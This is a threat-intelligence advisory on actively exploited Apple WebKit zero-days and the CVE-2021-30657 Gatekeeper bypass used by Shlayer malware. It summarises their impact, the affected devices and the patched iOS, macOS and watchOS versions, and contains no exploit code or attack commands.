Active Exploitation of Apple Zero-Day Vulnerabilities

A recent 0-day, dubbed CVE-2021-30657, is responsible for client-side attack vectors involving malware execution and is being exploited by Shlayer malware.
Updated on
April 19, 2023
Published on
July 14, 2021
Read MINUTES
5
Subscribe to the latest industry news, threats and resources.
Advisory Type  Vulnerability Intelligence
CVE ID CVE-2021-30657,30663, 30665, 30666
Vulnerability Type Remote Code Execution [RCE]
Vulnerable Application Apple iPhone WebKit Engine 
Affected Platform iOS/macOS/watchOS
 

Executive Summary

Adversaries are actively targeting and exploiting zero-day vulnerabilities in iOS. Based on the security advisories posted by Apple, there are critical bugs present in the WebKit Engine, a browser rendering engine that is used in web browsers like Safari (iOS) and other applications that render HTML. The bugs that were publicly disclosed, when exploited, led to remote code execution on affected systems. A recent 0-day, dubbed CVE-2021-30657, is responsible for client-side attack vectors involving malware execution by bypassing Apple’s File Quarantine, Gatekeeper, and Notarization security checks. This bug is actively exploited in the wild by Shlayer Malware.   

Threat Vector

The bug is triggered when the victim visits a malicious website hosted by the threat actor.

CVE

Type

Description

CVE-2021-30663 Integer Overflow/RCE An integer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution
CVE-2021-30665 Memory Corruption/RCE A memory corruption issue that could be exploited to craft malicious web content, which may lead to code execution
CVE-2021-30666 Buffer Overflow/RCE A buffer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution
Active malware campaigns targeting apple 0-days

CVE

Type

Description

CVE-2021-30657 Security Bypass  Bypass Apple's File Quarantine, Gatekeeper, and Notarization security checks [mac OS]
 
Shlayer Malware
Apple patched the zero-day, CVE-2021-30657, that was targeting MacOS and exploited in the wild by Shlayer malware to bypass Apple's File Quarantine, Gatekeeper, and Notarization security checks in order to download second-stage malicious payloads.  

Impact and Mitigation

Impact

Mitigation

  • RCE leads to unauthorized access to the target device’s OS and file systems, leading to user data compromise.
  • Attackers gain arbitrary code execution on the victim device leading to compromise of device control and security.
  • Security bypass vulnerabilities can lead to execution of malwares by bypassing the security features installed on the device.
For CVE-2021-30663/ CVE-2021-30665/ CVE-2021-30666:
  • The list of affected devices include:
    • iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)
    • macOS Big Sur
    • Apple Watch Series 3 and later
  • The bugs have been patched in recent updates including iOS 14.5.1, iOS 12.5.3, macOS Big Sur 11.3.1, and watchOS 7.4.1
For CVE-2021-30657:
  • Apple has fixed the bug in macOS 11.3.

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations